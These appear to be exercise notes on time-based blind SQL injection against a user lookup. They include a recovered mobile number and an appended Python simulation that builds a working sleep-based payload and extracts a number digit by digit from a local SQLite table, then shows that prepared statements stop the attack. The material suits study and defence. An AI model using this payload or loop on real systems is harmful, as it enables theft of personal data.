-
SQL injection possible (the user name is pasted into the query unescaped)
-
no boolean (true/false) result is visible in the response -> boolean-based blind SQL injection not possible
-
time-based blind SQL injection possible (the injected query delays the response whenever a brute-forced guess matches, so the response time is the oracle)
-
execute 2313.sh
-
The Java application is completely overkill for this task; I hope this one is sufficient, as it gets the task done.
-
The user can be supplied as a command-line parameter, e.g.
./2312.sh Sandra Fischer
-
The user defaults to Sandra Fischer.
-
The mobile number of Franziska Knobel is
0725445588
-
escape (sanitize) the user input as a first measure; escaping by hand is easy to get wrong, so it is not sufficient on its own
-
use prepared statements (bound parameters), so the user name is only ever treated as a value and never parsed as SQL
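Added example (Python, not the 2312.sh script from this exercise): a self-contained simulation of the time-based blind extraction described above and of the prepared-statement fix. It builds an in-memory SQLite table with constructed sample users (only the Franziska Knobel row matches the number found on this page), registers a SLEEP() function because SQLite has none (assumption: the real backend offers an equivalent, e.g. MySQL's SLEEP()), and then brute-forces the mobile number one digit at a time by measuring the response time of the vulnerable lookup. The same payload against the prepared-statement lookup extracts nothing. All function and table names are this example's own.

```python
import sqlite3
import time

# Constructed sample data for this example (only the Franziska Knobel entry
# matches the page); the lookup is keyed by the user name the script receives.
SAMPLE_USERS = [
    ("Sandra Fischer", "0791234567"),
    ("Franziska Knobel", "0725445588"),
]
SLEEP_SECONDS = 0.2            # delay the payload triggers on a correct guess
THRESHOLD = SLEEP_SECONDS / 2  # anything slower than this counts as "delayed"


def make_db():
    """In-memory SQLite database standing in for the exercise's database."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one (assumption: the real backend has an
    # equivalent, e.g. MySQL's SLEEP()) so the timing payload works locally.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (name TEXT, mobile TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user):
    """Builds the query by string concatenation: the user name is parsed as SQL."""
    sql = f"SELECT mobile FROM users WHERE name = '{user}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_prepared(conn, user):
    """Same query as a prepared statement: the user name is only ever a value."""
    rows = conn.execute("SELECT mobile FROM users WHERE name = ?", (user,))
    return [row[0] for row in rows]


def timing_payload(target, pos, ch):
    """Closes the name literal, sleeps only if character `pos` of the target's
    mobile equals `ch`, and comments out the rest of the query with `--`."""
    return (
        f"Sandra Fischer' AND (SELECT CASE WHEN substr(mobile,{pos},1)='{ch}' "
        f"THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END FROM users WHERE name='{target}')--"
    )


def delayed(lookup, conn, payload):
    """The oracle: True if the lookup took noticeably longer than normal."""
    start = time.monotonic()
    lookup(conn, payload)
    return time.monotonic() - start > THRESHOLD


def extract_mobile(conn, target, lookup=lookup_vulnerable, charset="0123456789"):
    """Recover the target's mobile digit by digit. Stops at the first position
    where no character of `charset` causes a delay (end of the number, or a
    character outside the charset)."""
    found = ""
    while True:
        for ch in charset:
            if delayed(lookup, conn, timing_payload(target, len(found) + 1, ch)):
                found += ch
                break
        else:
            return found


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup:", extract_mobile(db, "Franziska Knobel"))
    print("prepared statement:", repr(extract_mobile(db, "Franziska Knobel", lookup_prepared)))
```

In the exercise the oracle is the response time of the script or web application rather than a local function call, so the threshold has to be set well above the normal round-trip jitter; the structure of the loop (one position at a time, one candidate character per request, stop when nothing delays) is the same.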